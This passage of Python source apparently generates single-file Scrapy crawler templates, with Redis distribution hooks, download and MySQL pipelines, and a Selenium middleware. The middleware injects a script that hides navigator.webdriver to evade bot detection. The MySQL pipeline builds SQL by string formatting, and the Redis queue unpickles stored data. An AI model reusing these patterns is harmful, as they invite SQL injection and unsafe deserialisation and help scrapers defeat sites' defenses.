meta=d['meta'],
encoding=d['_encoding'],
priority=d['priority'],
dont_filter=d['dont_filter'],
flags=d.get('flags'))
return _cls
def _find_method(obj, func):
if obj: return func.__name__
raise ValueError("Function %s is not a method of: %s" % (func, obj))
def _get_method(obj, name):
name = str(name)
try:
return getattr(obj, name)
except AttributeError:
raise ValueError("Method %r not found in: %s" % (name, obj))
import pickle
class _serializer:
def loads(s): return pickle.loads(s)
def dumps(obj): return pickle.dumps(obj, protocol=-1)
class BaseQueue(object):
def __init__(self, server, spider, key):
self.server = server
self.spider = spider
self.key = key % {'spider': spider.name}
self.serializer = _serializer
def _encode_request(self, request): obj = request_to_dict(request, self.spider); return self.serializer.dumps(obj)
def _decode_request(self, encoded_request): obj = self.serializer.loads(encoded_request); return request_from_dict(obj, self.spider)
def __len__(self): raise NotImplementedError
def push(self, request): raise NotImplementedError
def pop(self, timeout=0): raise NotImplementedError
def clear(self): self.server.delete(self.key)
class FifoQueue(BaseQueue):
def __len__(self): return self.server.llen(self.key)
def push(self, request): self.server.lpush(self.key, self._encode_request(request))
def pop(self, timeout=0):
if timeout > 0:
data = self.server.brpop(self.key, timeout)
if isinstance(data, tuple):
data = data[1]
else:
data = self.server.rpop(self.key)
if data:
return self._decode_request(data)
import logging
from scrapy.dupefilters import BaseDupeFilter
from scrapy.utils.request import request_fingerprint
_logger = logging.getLogger(__name__)
class RFPDupeFilter(BaseDupeFilter):
logger = _logger
def __init__(self, server, key, debug=False):
self.server = server
self.key = key
self.debug = debug
self.logdupes = True
def request_seen(self, request): return self.server.sadd(self.key, self.request_fingerprint(request)) == 0
def request_fingerprint(self, request): return request_fingerprint(request)
def close(self, reason=''): self.clear()
def clear(self): self.server.delete(self.key)
def log(self, request, spider):
if self.debug:
msg = "Filtered duplicate request: %(request)s"
self.logger.debug(msg, {'request': request}, extra={'spider': spider})
elif self.logdupes:
msg = ("Filtered duplicate request %(request)s"
" - no more duplicates will be shown"
" (see DUPEFILTER_DEBUG to show all duplicates)")
self.logger.debug(msg, {'request': request}, extra={'spider': spider})
self.logdupes = False
import pprint
from datetime import datetime, timedelta
class RedisStatsCollector:
def __init__(self, crawler):
self._spider_id_task_format = TASK_STATS
self._dump = crawler.settings.getbool('STATS_DUMP')
self._local_max = 'DEPTH'
self._maxdp = 0
self.server = redis.StrictRedis(**REDIS_PARAMS)
self.server.ping()
self.encoding = self.server.connection_pool.connection_kwargs.get('encoding')
def get_stats(self, spider=None):
_stat = {}
for key,val in self.server.hgetall(self._spider_id_task_format).items():
key,val = key.decode(self.encoding),val.decode(self.encoding)
try:
if key in ['finish_reason']: _stat[key] = val
elif key in ['finish_time', 'start_time']: _stat[key] = datetime.strptime(val, "%Y-%m-%d %H:%M:%S.%f")
else: _stat[key] = int(val)
except:
_stat[key] = val
return _stat
def set_value(self, key, value, spider=None):
tname = self._spider_id_task_format
if type(value) == datetime: value = str(value + timedelta(hours=8)) # 将默认utc时区转到中国,方便我使用
self.server.hsetnx(tname, key, value)
def inc_value(self, key, count=1, start=0, spider=None):
if spider: self.server.hincrby(self._spider_id_task_format, key, count)
def max_value(self, key, value, spider=None):
if value > self._maxdp: self._maxdp = value; self.server.hset(self._spider_id_task_format, key, value)
def open_spider(self, spider): pass
def close_spider(self, spider, reason):
if self._dump:
_logger.info("Dumping Scrapy stats:\n" + pprint.pformat(self.get_stats(spider)), extra={'spider': spider})
class Scheduler(object):
def __init__(self, server, persist=False, flush_on_start=False, idle_before_close=0):
self.server = server
self.persist = persist
self.flush_on_start = flush_on_start
self.idle_before_close = idle_before_close
self.stats = None
self.queue_key = QUEUE_KEY
self.dupefilter_key = DUPEFILTER_KEY
def __len__(self): return len(self.queue)
@classmethod
def from_settings(cls, settings):
server = redis.StrictRedis(**REDIS_PARAMS)
server.ping()
return cls(server=server, **EXTRA_SETTING)
@classmethod
def from_crawler(cls, crawler):
instance = cls.from_settings(crawler.settings)
instance.stats = crawler.stats
return instance
def open(self, spider):
self.spider = spider
try: self.queue = FifoQueue(server=self.server, spider=spider, key=self.queue_key % {'spider': spider.name})
except TypeError as e: raise ValueError("Failed to instantiate queue class '%s': %s", self.queue_cls, e)
try: self.df = RFPDupeFilter(server=self.server, key=self.dupefilter_key % {'spider': spider.name}, debug=False)
except TypeError as e: raise ValueError("Failed to instantiate dupefilter class '%s': %s", self.dupefilter_cls, e)
if self.flush_on_start: self.flush()
if len(self.queue): spider.log("Resuming crawl (%d requests scheduled)" % len(self.queue))
def close(self, reason):
if not self.persist: self.flush()
def flush(self): self.df.clear(); self.queue.clear()
def enqueue_request(self, request):
if not request.dont_filter and self.df.request_seen(request): self.df.log(request, self.spider); return False
if self.stats: self.stats.inc_value('scheduler/enqueued/redis', spider=self.spider)
self.queue.push(request)
return True
def next_request(self):
block_pop_timeout = self.idle_before_close
request = self.queue.pop(block_pop_timeout)
if request and self.stats: self.stats.inc_value('scheduler/dequeued/redis', spider=self.spider)
return request
def has_pending_requests(self): return len(self) > 0
from scrapy import signals
from scrapy.core.scraper import Scraper
from scrapy.core.engine import ExecutionEngine
from scrapy.utils.misc import load_object
def __hook_init__(self, crawler, spider_closed_callback):
self.crawler = crawler
self.settings = crawler.settings
self.signals = crawler.signals
self.logformatter = crawler.logformatter
self.slot = None
self.spider = None
self.running = False
self.paused = False
self.scheduler_cls = Scheduler
downloader_cls = load_object(self.settings['DOWNLOADER'])
self.downloader = downloader_cls(crawler)
self.scraper = Scraper(crawler)
self._spider_closed_callback = spider_closed_callback
ExecutionEngine.__init__ = __hook_init__
_bak_next_request = ExecutionEngine._next_request
START_TOGGLE_HOOK = True
def __hook_next_request(self, spider):
nonlocal START_TOGGLE_HOOK
if START_TOGGLE_HOOK:
r = self.crawler.stats.server.hincrby(TASK_STATS, 'start_toggle_requests')
if r != 1: self.slot.start_requests = None # 让其他非首次启动的 start_requests 不执行
START_TOGGLE_HOOK = False
_bak_next_request(self, spider)
ExecutionEngine._next_request = __hook_next_request
import scrapy.spiders
from scrapy import signals
from scrapy.exceptions import DontCloseSpider
from scrapy.spiders import Spider
class RedisMixin(object):
redis_key = None
redis_batch_size = None
redis_encoding = None
server = None
def start_requests(self): return self.next_requests()
def setup_redis(self, crawler=None):
if self.server is not None: return
settings = crawler.settings
self.redis_key = QUEUE_KEY
self.redis_batch_size = settings.getint('CONCURRENT_REQUESTS')
self.server = redis.StrictRedis(**REDIS_PARAMS)
crawler.signals.connect(self.spider_idle, signal=signals.spider_idle)
def next_requests(self):
fetch_one = self.server.lpop
found = 0
while found < self.redis_batch_size:
data = fetch_one(self.redis_key)
if not data: break
req = self.make_request_from_data(data)
if req:
yield req
found += 1
else:
self.logger.debug("Request not made from data: %r", data)
if found:
self.logger.debug("Read %s requests from '%s'", found, self.redis_key)
def make_request_from_data(self, data): return self.make_requests_from_url(data.decode(self.redis_encoding))
def schedule_next_requests(self):
for req in self.next_requests(): self.crawler.engine.crawl(req, spider=self)
def spider_idle(self):
self.schedule_next_requests()
raise DontCloseSpider
class RedisSpider(RedisMixin, Spider):
@classmethod
def from_crawler(self, crawler, *args, **kwargs):
obj = super(RedisSpider, self).from_crawler(crawler, *args, **kwargs)
obj.setup_redis(crawler)
return obj
scrapy.Spider = RedisSpider
import scrapy.spiders
import scrapy.extensions.telnet
import scrapy.extensions.memusage
import scrapy.extensions.logstats
import scrapy.statscollectors
scrapy.extensions.telnet.TelnetConsole.__init__ = lambda self,_:None # 关闭这个插件,我不用(这种关闭插件的方式小孩子可不要学哦~)
scrapy.extensions.memusage.MemoryUsage.__init__ = lambda self,_:None # 同样的理由,我不用
scrapy.extensions.logstats.LogStats.from_crawler = lambda self:None # 同样的理由,我不用
scrapy.statscollectors.MemoryStatsCollector = RedisStatsCollector # 挂钩默认日志,让其自动支持redis日志(这种抽象的钩子技术小孩子可不要学哦~)
import json
import scrapy.pipelines
from scrapy.core.spidermw import SpiderMiddlewareManager
TASK_COLLECTION = None
class VRedisPipeline(object):
def __init__(self):
self.key = TASK_COLLECTION
self.server = redis.StrictRedis(**REDIS_PARAMS)
self.server.ping()
def process_item(self, item, spider):
if self.key:
self.server.lpush(self.key, json.dumps(item))
return item
def __hook_scraper_init__(self, crawler):
self.slot = None
self.spidermw = SpiderMiddlewareManager.from_crawler(crawler)
itemproc_cls = scrapy.pipelines.ItemPipelineManager()
self.itemproc = itemproc_cls.from_crawler(crawler)
self.itemproc._add_middleware(VRedisPipeline()) # 挂钩scraper的初始化,在此刻增加redis写入中间件
self.concurrent_items = crawler.settings.getint('CONCURRENT_ITEMS')
self.crawler = crawler
self.signals = crawler.signals
self.logformatter = crawler.logformatter
import scrapy.core.scraper
scrapy.core.scraper.Scraper.__init__ = __hook_scraper_init__
EXTRA_SETTING = {
'persist': True, # 任务(意外或正常)结束是否保留过滤池或任务队列(使用默认配置即可)
'flush_on_start': False, # 任务开始时是否需要进行队列和过滤池的清空处理(使用默认配置即可)
'idle_before_close': 0, # 约等于redis中的(包括且不限于)函数 brpop(key,timeout) 中的参数 timeout
}
REDIS_PARAMS = {
'host':'127.0.0.1', # 最需要主动配置的部分1
'port':6379, # 最需要主动配置的部分2
'password': None, # 最需要主动配置的部分3
'socket_timeout': 30,
'socket_connect_timeout': 30,
'retry_on_timeout': True,
'encoding': 'utf-8',
}
QUEUE_KEY = 'scrapy_redis:{}:TASK_QUEUE'.format(namespace) # 任务队列(当任务正常执行完,必然是空)
DUPEFILTER_KEY = 'scrapy_redis:{}:DUPEFILTER'.format(namespace) # 过滤池(用于放置每个请求的指纹)
TASK_STATS = 'scrapy_redis:{}:TASK_STATS'.format(namespace) # 任务状态日志
TASK_COLLECTION = 'scrapy_redis:{}:COLLECTION'.format(namespace) # 数据收集的地方(默认使用redis收集json.dumps的数据),注释这行数据就不收集到redis
# 使用这个函数后爬虫自动变成分布式(注意要先设置好 redis 连接的配置)
# 使用时尽量一个任务一个 namespace,因为一旦任务启动,相同 namespace 下的爬虫的 start_requests 函数只会执行一次。
# 除非主动修改 TASK_STATS 中的 start_toggle_requests 字段为0,新的任务才会执行 start_requests
hook_to_scrapy_redis(namespace='vilame') # 不想用分布式直接注释掉该行函数执行即可。
''' + '\n'*16
_single_script_middleware_new = '''# -*- coding: utf-8 -*-
# 挂钩中间件加载的处理,让通过“字符串”加载中间件的函数能够同时兼容用“类”加载中间件
import scrapy.utils.misc
import scrapy.utils.deprecate
_bak_load_object = scrapy.utils.misc.load_object
_bak_update_classpath = scrapy.utils.deprecate.update_classpath
def _load_object(path_or_class):
try: return _bak_load_object(path_or_class)
except: return path_or_class
def _update_classpath(path_or_class):
try: return _bak_update_classpath(path_or_class)
except: return path_or_class
scrapy.utils.misc.load_object = _load_object
scrapy.utils.deprecate.update_classpath = _update_classpath
# 如果使用 pyinstaller 打包 scrapy 脚本成为单个 exe,打包命令如下。(注意修改脚本名称)
# pyinstaller -F $你的scrapy单脚本.py '''+_pyinstaller_scrapy+'''
# 注意,这里的打包默认去除最常见影响大小的库 numpy scipy matplotlib PyQt5,如有需要引用请删除这里的部分 --exclude-module
# 基础 item 中间件模板
class VPipeline(object):
def process_item(self, item, spider):
print('\\n==== 这里是动态增加的“下载中间件”部分 ====\\n')
return item
# 图片下载 item 中间件
import logging, hashlib
from scrapy.pipelines.images import ImagesPipeline
from scrapy.exceptions import DropItem
class VImagePipeline(ImagesPipeline):
IMAGES_STORE = None
def __init__(self, store_uri, download_func=None, settings=None):
super().__init__(store_uri, download_func, settings)
VImagePipeline.IMAGES_STORE = settings.get('IMAGES_STORE')
def get_media_requests(self, item, info):
headers = {
"accept-encoding": "gzip, deflate", # auto delete br encoding. cos requests and scrapy can not decode it.
"accept-language": "zh-CN,zh;q=0.9",
"accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8",
"user-agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.75 Safari/537.36"
}
item = item.copy()
item['download_timeout'] = 180 # 下载单张图片的时间限制
yield Request(item['src'], headers=headers, meta=item)
def file_path(self, request, response=None, info=None):
url = request if not isinstance(request, Request) else request.url
image_name = request.meta.get('image_name') # 使用 item中的 image_name 字段作为文件名进行存储,没有该字段则使用 url的 md5作为文件名存储
image_name = re.sub(r'[/\\\\:\\*"<>\\|\\?]', '_', image_name).strip()[:80] if image_name else hashlib.md5(url.encode()).hexdigest()
return '%s.jpg' % image_name # 生成的图片文件名字,此处可用/符号增加多级分类路径(路径不存在则自动创建),使用 image_name 请注意重名可能性。
def item_completed(self, results, item, info): # 判断下载是否成功
k, v = results[0]
item['image_download_stat'] = 'success' if k else 'fail'
item['image_path'] = os.path.join(VImagePipeline.IMAGES_STORE, v['path']).replace('\\\\', '/') if k else None # 保留文件名地址
if not k: logging.info('download fail {}'.format(item))
else: logging.info('download success {}'.format(item))
return item
# 文件下载 item 中间件
import logging, hashlib
from scrapy.pipelines.files import FilesPipeline
class VFilePipeline(FilesPipeline):
FILES_STORE = None
def __init__(self, store_uri, download_func=None, settings=None):
super().__init__(store_uri, download_func, settings)
VFilePipeline.FILES_STORE = settings.get('FILES_STORE')
def get_media_requests(self, item, info):
headers = {
"accept-encoding": "gzip, deflate", # auto delete br encoding. cos requests and scrapy can not decode it.
"accept-language": "zh-CN,zh;q=0.9",
"accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8",
"user-agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.75 Safari/537.36"
}
item = item.copy()
item['download_timeout'] = 180 # 下载单条文件的时间限制
yield Request(item['src'], headers=headers, meta=item)
def file_path(self, request, response=None, info=None):
url = request if not isinstance(request, Request) else request.url
file_name = request.meta.get('file_name')
file_type = request.meta.get('file_type')
file_name = re.sub(r'[/\\\\:\\*"<>\\|\\?]', '_', file_name).strip()[:80] if file_name else hashlib.md5(url.encode()).hexdigest()
if not file_type:
file_type = request.url.rsplit('.', 1)[-1]
file_type = file_type if '/' not in file_type else 'unknown'
return '{}.{}'.format(file_name, file_type)
def item_completed(self, results, item, info): # 判断下载是否成功
k, v = results[0]
item['file_download_stat'] = 'success' if k else 'fail'
item['file_path'] = os.path.join(VFilePipeline.FILES_STORE, v['path']).replace('\\\\', '/') if k else None # 保留文件名地址
if not k: logging.info('download fail {}'.format(item))
else: logging.info('download success {}'.format(item))
return item
# 阿里 Oss 文件上传中间件模板
# 依赖 pip install oss2
class VOssPipeline:
BUCKET_STORE = None
@classmethod
def from_crawler(cls, crawler):
s = cls()
import oss2
aid = 'kkkkkkkkkkkkkkkkkkkkkkkk'
ack = 'vvvvvvvvvvvvvvvvvvvvvvvvvvvvvv'
enp = 'http://oss-cn-hangzhou.aliyuncs.com'
_bucket = '<bucket name>'
VOssPipeline.BUCKET_STORE = oss2.Bucket(oss2.Auth(aid,ack), enp, _bucket)
return s
def process_item(self, item, spider):
# 示例: 用于将下载到的图片上传到Oss的代码如下
# ipath = item.get('image_path')
# if ipath and os.path.isfile(ipath): self.update_data(ipath, ipath)
return item
def update_data(self, object_name, localfile_name):
VOssPipeline.BUCKET_STORE.put_object_from_file(object_name, localfile_name)
# import you_get.extractors # 使用 pyinstaller 打包 you-get 时,需要在全局环境显式导入该行代码,让 pyinstaller 自动包含该库内容
# from youtube_dl import YoutubeDL # 使用 pyinstaller 打包 youtube-dl 时,需要在全局环境显式导入该行代码,让 pyinstaller 自动包含该库内容
# 视频下载 item 中间件
import os, sys
import logging, hashlib, traceback
from scrapy.exceptions import NotConfigured
class VVideoPipeline(object):
MEDIAS_STORE = None
@classmethod
def from_crawler(cls, crawler):
s = cls(crawler.settings)
return s
def __init__(self, settings=None):
VVideoPipeline.MEDIAS_STORE = settings.get('MEDIAS_STORE')
if not VVideoPipeline.MEDIAS_STORE:
err = 'before use VVideoPipeline. pls set MEDIAS_STORE first !!!'
logging.error('\\n--------------\\n{}\\n--------------'.format(err))
raise NotConfigured
def process_item(self, item, spider):
url = item['src']
        localpage_ = os.path.dirname(os.path.realpath(sys.argv[0])) # make sure downloads land in the MEDIAS_STORE folder next to this script (or next to the pyinstaller-packed executable)
localpage = os.path.join(localpage_, VVideoPipeline.MEDIAS_STORE)
try:
### 【you-get】
# import you_get.common
# you_get.common.skip_existing_file_size_check = True # 防止发现重复视频时会强制要求输入“是否覆盖”,卡住程序,默认不覆盖
# you_get.common.any_download(url, output_dir=localpage, merge=True, info_only=False)
### 【youtube-dl】 (推荐使用这个,因为这个在存储的文件名字的自定义存储上会更强)
from youtube_dl import YoutubeDL
file_name, file_type = item.get('file_name'), item.get('file_type')
fpath = '{}/%(title)s.%(ext)s'.format(item.get('file_path').strip('/\\\\')) if item.get('file_path') else '%(title)s.%(ext)s'
fpath = os.path.join(localpage, fpath).replace('\\\\', '/')
fpath = fpath.replace('%(title)s', file_name) if file_name else fpath
fpath = fpath.replace('%(ext)s', file_type) if file_type else fpath
ytdl = YoutubeDL({'outtmpl': fpath, 'ffmpeg_location':None}) # 如果已配置ffmpeg环境则不用修改
info = ytdl.extract_info(url, download=True)
dpath = {}
if '%(title)s' in fpath: dpath['title'] = info['title']
if '%(ext)s' in fpath: dpath['ext'] = info['ext']
path = fpath % dpath
item['media_download_stat'] = 'success'
item['media_path'] = path.replace(localpage_.replace('\\\\', '/'), '.') # 保留文件名地址
logging.info('download success {}'.format(item))
except:
item['media_download_stat'] = 'fail'
item['media_path'] = None
logging.info('download fail {}'.format(item))
logging.info('download reason {}'.format(traceback.format_exc()))
return item
# 数据库上传 item 中间件(不考虑字段类型处理,每个字段统统使用 MEDIUMTEXT 类型存储 json.dumps 后的 value)
# 如果有数据库字段类型的个性化处理,请非常注意的修改 insert_item 和 init_database 两个函数中对于字段类型的初始化、插入的处理,process_item无需修改。
import hmac, logging, traceback
from twisted.enterprise import adbapi
class VMySQLPipeline(object):
dbn = {}
def process_item(self, item, spider):
mysql_config = item.pop('__mysql__', None) # 存储时自动删除配置
if mysql_config and item:
if type(mysql_config) is dict:
table = mysql_config.pop('table', None)
db = mysql_config.get('db', None) or 'vrequest'
mysql_config.setdefault('charset','utf8mb4')
mysql_config.setdefault('db', db)
dbk = hmac.new(b'',json.dumps(mysql_config, sort_keys=True).encode(),'md5').hexdigest()
if dbk not in self.dbn:
self.dbn[dbk] = adbapi.ConnectionPool('pymysql', **mysql_config)
self.init_database(self.dbn[dbk], mysql_config, db, table, item)
self.dbn[dbk].runInteraction(self.insert_item, db, table, item)
return item
else:
raise TypeError('Unable Parse mysql_config type:{}'.format(type(mysql_config)))
else:
return item
def insert_item(self, conn, db, table, item):
table_sql = ''.join(["'{}',".format(json.dumps(v, ensure_ascii=False).replace("'","\\\\'")) for k,v in item.items()])
insert_sql = 'INSERT INTO `{}`.`{}` VALUES({})'.format(db, table, table_sql.strip(','))
try:
conn.execute(insert_sql)
logging.info('insert sql success')
except Exception as e:
logging.info('insert sql fail: {}'.format(insert_sql))
logging.error(traceback.format_exc())
def init_database(self, pool, mysql_config, db, table, item):
# 需要注意的是,在一些非常老的版本的mysql 里面并不支持 utf8mb4。这是 mysql 的设计缺陷,赶紧使用大于 5.5 版本的 mysql !
# 创建db,创建表名,所有字段都以 MEDIUMTEXT 存储,用 json.dumps 保证了数据类型也能存储,后续取出时只需要每个值 json.loads 这样就能获取数据类型
# 例如一个数字类型 123 -> json.dumps -> '123' -> json.loads -> 123,统一类型存储,取出时又能保证数据类型,这种处理会很方便
# MEDIUMTEXT 最大能使用16M 的长度,所以对于一般的 html 文本也非常足够。如有自定义字段类型的需求,请注意修改该处。
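        # Quick illustration of the json round-trip this scheme relies on (not executed here):
        #   json.loads(json.dumps(123))     -> 123      (int comes back as int)
        #   json.loads(json.dumps('123'))   -> '123'    (str stays str)
        #   json.loads(json.dumps([1, 2]))  -> [1, 2]   (lists/dicts survive as well)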
db, charset = mysql_config.pop('db'), mysql_config.get('charset')
try:
conn = pool.dbapi.connect(**mysql_config)
cursor = conn.cursor()
table_sql = ''.join(['`{}` MEDIUMTEXT NULL,'.format(str(k)) for k,v in item.items()])
cursor.execute('Create Database If Not Exists {} Character Set {}'.format(db, charset))
cursor.execute('Create Table If Not Exists `{}`.`{}` ({})'.format(db, table, table_sql.strip(',')))
conn.commit(); cursor.close(); conn.close()
except Exception as e:
traceback.print_exc()
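# Illustrative item shape that VMySQLPipeline expects (hypothetical values; every key except 'table'
# is forwarded to pymysql.connect through adbapi.ConnectionPool, so use pymysql connection kwargs):
#   item['__mysql__'] = {'host': '127.0.0.1', 'port': 3306, 'user': 'root',
#                        'password': '******', 'db': 'vrequest', 'table': 'my_table'}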
# scrapy 默认项目中的 SPIDER_MIDDLEWARES,DOWNLOADER_MIDDLEWARES 中间件的模板,按需修改
from scrapy import signals
class VSpiderMiddleware(object):
@classmethod
def from_crawler(cls, crawler):
s = cls()
crawler.signals.connect(s.spider_opened, signal=signals.spider_opened)
return s
def process_spider_input(self, response, spider):
return None
def process_spider_output(self, response, result, spider):
for i in result:
yield i
def process_spider_exception(self, response, exception, spider):
pass
def process_start_requests(self, start_requests, spider):
for r in start_requests:
yield r
def spider_opened(self, spider):
spider.logger.info('Spider opened: %s' % spider.name)
class VDownloaderMiddleware(object):
@classmethod
def from_crawler(cls, crawler):
s = cls()
crawler.signals.connect(s.spider_opened, signal=signals.spider_opened)
return s
def process_request(self, request, spider):
return None
def process_response(self, request, response, spider):
return response
def process_exception(self, request, exception, spider):
pass
def spider_opened(self, spider):
spider.logger.info('Spider opened: %s' % spider.name)
# 配置 selenium 的使用方式
import time
from scrapy.http import HtmlResponse
class VSeleniumMiddleware(object):
@classmethod
def from_crawler(cls, crawler):
s = cls()
crawler.signals.connect(s.spider_opened, signal=signals.spider_opened)
crawler.signals.connect(s.spider_closed, signal=signals.spider_closed)
return s
def process_request(self, request, spider):
try:
self.webdriver.get(url=request.url)
time.sleep(2)
# 部分智能等待的代码,提高浏览器效率的处理
# from selenium.webdriver.common.by import By
# from selenium.webdriver.support import expected_conditions as EC
# from selenium.webdriver.support.wait import WebDriverWait as wbw
# locator = (By.XPATH, '//img[@class="focus-item-img"]')
# # wbw(self.webdriver,10).until(EC.presence_of_element_located(locator)) # 判断某个元素是否被加到了dom树里
# wbw(self.webdriver,10).until(EC.visibility_of_element_located(locator)) # 判断某个元素是否被添加到了dom里并且可见,即宽和高都大于0
current_url = self.webdriver.current_url
page_source = self.webdriver.page_source
except Exception as e:
return self._parse_selenium_temp_exceptions(request, spider, e)
# 若是出现请求异常(验证码,或者重新登陆之类的处理),请在这里判断 page_source 是否是异常情况,并在这里处理重新进行登录或其他
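            # e.g. a minimal sketch (hypothetical marker text, adjust to the target site):
            #   if '验证码' in page_source:
            #       self._login()
            #       return request.replace(dont_filter=True)  # re-schedule the request after logging in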
h = HtmlResponse(
url = current_url,
headers = {'Selenium':'Selenium cannot get a certain headers, This is the information created automatically by middleware.'},
body = page_source,
encoding = 'utf-8',
request = request
)
return h
def process_response(self, request, response, spider):
return response
def spider_opened(self, spider):
spider.logger.info('Spider %s opened: %s' % (self.__class__.__name__, spider.name))
self._open_webdriver()
self._login()
def spider_closed(self):
if getattr(self, 'webdriver', None): self.webdriver.quit()
def _parse_selenium_temp_exceptions(self, request, spider, e):
stats = spider.crawler.stats
if 'Failed to establish a new connection' in str(e): # 仅仅捕捉浏览器异常关闭的异常,尝试重启,并重新将请求发送到队列
if getattr(self, 'restart_show_toggle', None) is None:
self.restart_show_toggle = True
if self.restart_show_toggle:
self.restart_show_toggle = False # 让 Catch webdriver 仅显示一次
spider.logger.info('Catch webdriver exception:{}, try to restart webdriver.'.format(e.__class__))
self._open_webdriver()
retries = request.meta.get('selenium_retry_times', 0) + 1 # 在 selenium 异常无法重启处理情况下一个请求最多尝试共3次请求
if retries <= 3:
retryreq = request.copy()
retryreq.meta['selenium_retry_times'] = retries
retryreq.dont_filter = True
stats.inc_value('selenium_retry/count')
return retryreq
else:
stats.inc_value('selenium_retry/max_reached')
spider.logger.info("Gave up selenium_retrying %(request)s (failed %(retries)d times)",
{'request': request, 'retries': retries})
else:
stats.inc_value('selenium_unknow_error/count')
stats.inc_value('selenium_unknow_error/reason_count/%s' % e.__class__.__name__)
import traceback
spider.logger.info('\\n'+traceback.format_exc().strip())
def _open_webdriver(self): # 该函数同时作为重启 webdriver 功能使用
try: self.spider_closed()
except: pass
from selenium import webdriver
option = webdriver.ChromeOptions()
extset = ['enable-automation', 'ignore-certificate-errors']
ignimg = "profile.managed_default_content_settings.images"
mobile = {'deviceName':'Galaxy S5'}
option.add_argument("--disable-infobars") # 旧版本关闭“chrome正受到自动测试软件的控制”信息
option.add_experimental_option("excludeSwitches", extset) # 新版本关闭“chrome正受到自动测试软件的控制”信息
option.add_experimental_option("useAutomationExtension", False) # 新版本关闭“请停用以开发者模式运行的扩展程序”信息
# option.add_experimental_option('mobileEmulation', mobile) # 是否使用手机模式打开浏览器
# option.add_experimental_option("prefs", {ignore_image: 2}) # 开启浏览器时不加载图片(headless模式该配置无效)
# option.add_argument('--start-maximized') # 开启浏览器时是否最大化(headless模式该配置无效)
# option.add_argument('--headless') # 【*】 无界面浏览器,linux 使用 selenium 必须配置该项
# option.add_argument('--no-sandbox') # 【*】 关闭沙箱模式,linux 使用 selenium 必须配置该项
# option.add_argument('--disable-dev-shm-usage') # 【*】 你只需要知道,linux 使用 selenium 需要尽量配置该项
# option.add_argument('--window-size=1920,1080') # 无界面打开浏览器时候只能用这种方式实现最大化
# option.add_argument('--disable-gpu') # 禁用 gpu 硬件加速
# option.add_argument("--auto-open-devtools-for-tabs") # 开启浏览器时候是否打开开发者工具(F12)
# option.add_argument("--user-agent=Mozilla/5.0 VILAME") # 修改 UA 信息
# option.add_argument('--proxy-server=http://127.0.0.1:8888') # 增加代理
self.webdriver = webdriver.Chrome(chrome_options=option)
try:
# 让每打开一个网页首先执行部分 js代码,下面 js代码可以绕过部分 webdriver 检测。
self.webdriver.execute_cdp_cmd("Page.addScriptToEvaluateOnNewDocument", {
"source": """
Object.defineProperty(navigator, 'webdriver', {
get: () => undefined
});
"""
})
self.webdriver.execute_cdp_cmd("Network.enable", {})
except:
import traceback
print('[ ERROR! ] error in selenium webdriver execute_cdp_cmd func.')
print(traceback.format_exc())
def _login(self):
# 如果有登录处理,则写在这里
pass
# 定时任务执行插件
import types
import scrapy
from scrapy.exceptions import DontCloseSpider
from twisted.internet import task, defer, reactor
from scrapy import signals
class TimerRequest(object):
def __init__(self, crawler, interval):
self.interval = interval
self.task = None
self.crawler = crawler
@classmethod
def from_crawler(cls, crawler):
o = cls(crawler, crawler.settings.get('TIMER_INTERVAL') or 3)
crawler.signals.connect(o.spider_opened, signal=signals.spider_opened)
crawler.signals.connect(o.spider_closed, signal=signals.spider_closed)
crawler.signals.connect(o.spider_idle, signal=signals.spider_idle)
return o
def spider_opened(self, spider):
self.task = task.LoopingCall(self.new_request, spider)
if getattr(spider, 'timer_task', None):
d = defer.Deferred()
reactor.callLater(self.interval, self.task.start, self.interval)
else:
print('[ WARNING! ] Spider does not have timer_task function')
def new_request(self, spider):
r = getattr(spider, 'timer_task', None)()
if isinstance(r, scrapy.Request):
self.crawler.engine.crawl(r, spider=spider)
elif isinstance(r, (types.GeneratorType, list)):
for i in r:
if isinstance(i, scrapy.Request):
self.crawler.engine.crawl(i, spider=spider)
def spider_closed(self, spider, reason):
if self.task and self.task.running:
self.task.stop()
def spider_idle(self):
raise DontCloseSpider
'''
_single_script_middleware_new2 = '''
# 【中间件/管道配置】
# 这里使用中间件的方式和项目启动很相似,我在头部打了补丁函数,现在管道配置的第一个值可以同时用字符串或类配置,突破了原版只能用字符串的限制。
'IMAGES_STORE': 'image', # 默认在该脚本路径下创建文件夹、下载【图片】(不解开 VImagePipeline 管道注释则该配置无效)
'FILES_STORE': 'file', # 默认在该脚本路径下创建文件夹、下载【文件】(不解开 VFilePipeline 管道注释则该配置无效)
'MEDIAS_STORE': 'media', # 默认在该脚本路径下创建文件夹、下载【媒体】(不解开 VVideoPipeline 管道注释则该配置无效)
'ITEM_PIPELINES': {
# VPipeline: 101, # 普通的中间件使用(解开即可测试,如需魔改,请在脚本顶部找对应的类进行自定义处理)
# VImagePipeline: 102, # 图片下载中间件,item 带有 src 字段则以此作为图片地址下载到 IMAGES_STORE 地址的文件夹内
# VFilePipeline: 103, # 文件下载中间件,item 带有 src 字段则以此作为文件地址下载到 FILES_STORE 地址的文件夹内
# VVideoPipeline: 104, # 视频下载中间件,item 带有 src 字段则以此作为媒体地址下载到 MEDIAS_STORE 文件夹内
# VMySQLPipeline: 105, # MySql 插入中间件,具体请看类的描述
# VOssPipeline: 106, # 将本地数据上传到 OSS 空间的管道模板,注意修改模板内 process_item 函数来指定上传文件地址
},
'SPIDER_MIDDLEWARES': {
# VSpiderMiddleware: 543, # 原版模板的单脚本插入方式
},
'DOWNLOADER_MIDDLEWARES': {
# VDownloaderMiddleware: 543, # 原版模板的单脚本插入方式
# VSeleniumMiddleware: 544, # 单脚本 Selenium 中间件配置,解开自动使用 Selenium,详细请看 VSeleniumMiddleware 类中间件代码。
},
'TIMER_INTERVAL': 1, # 定时执行任务插件参数,打开 TimerRequest 插件注释即可使用,如未设置默认为3
'EXTENSIONS': {
# TimerRequest: 101, # 定时执行任务插件,在 VSpider 类中定义一个名为 timer_task 的函数,将会自动每n秒执行一次,
# 如果 timer_task 返回的结果是 scrapy.Request 对象或该对象列表(或迭代器)则自动发出请求。
# 开启该插件后脚本将不会自动停止。
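        # A minimal timer_task sketch (hypothetical; define it as a method on your VSpider class,
        # assuming scrapy is imported in the generated script as the template above does):
        #     def timer_task(self):
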